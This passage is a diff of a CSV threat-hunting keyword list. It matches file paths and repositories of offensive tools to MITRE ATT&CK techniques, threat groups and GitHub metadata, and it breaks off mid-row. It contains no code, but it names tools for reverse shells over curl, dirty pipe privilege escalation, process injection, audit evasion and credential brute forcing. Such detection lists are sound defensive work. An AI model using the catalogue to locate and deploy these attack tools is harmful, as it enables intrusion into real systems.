TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" -"*/curlshell.git*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*/curlshell.git*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" "*/custom_payload_generator/*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" -"*/customPayload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/CVE-*-*_POC.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/CVE-*.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/CVE-*.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/customPayload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*-*_POC.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/CVE-*.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/CVE*/chocobo_root*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/cve*/exploit.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/cve*/exploit.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/CVE-*_EXPLOIT_0DAY/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" -"*/CVE-*x64.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/CVE-*x86.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/CVE-*x64.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*x86.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/CVE-2009-2698/katon.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/CVE-2022-*.git*","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/CVE-2022-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/CVE-2022-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*/CVE-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/CVE-2022-0847/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/CVE-2022-0847-dirty-pipe-checker*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" @@ -3244,37 +3250,39 @@ "*/D1rkInject.git*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*/d4em0n/exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/DAMP.git*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*/DanMcInerney/ridenum*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/daphne.git*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/daphne-x64*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/darkarmour.git*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" -"*/DarkCoderSc/*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/DarkCoderSc/*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" "*/darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/darkhotel.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/DarkLoadLibrary.git*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*/DarkLoadLibrary.git*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*/darkweb2017-top100.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/DarkWidow.git*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" -"*/data/attacks/*.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*/data/auxiliary/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/data/attacks/*.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/data/auxiliary/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/data/empire.db*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*/data/exploits/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/data/shellcode*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/DavRelayUp.git*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" -"*/DavRelayUp/*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","446","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/data/exploits/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/data/nxc.conf*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/data/shellcode*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration 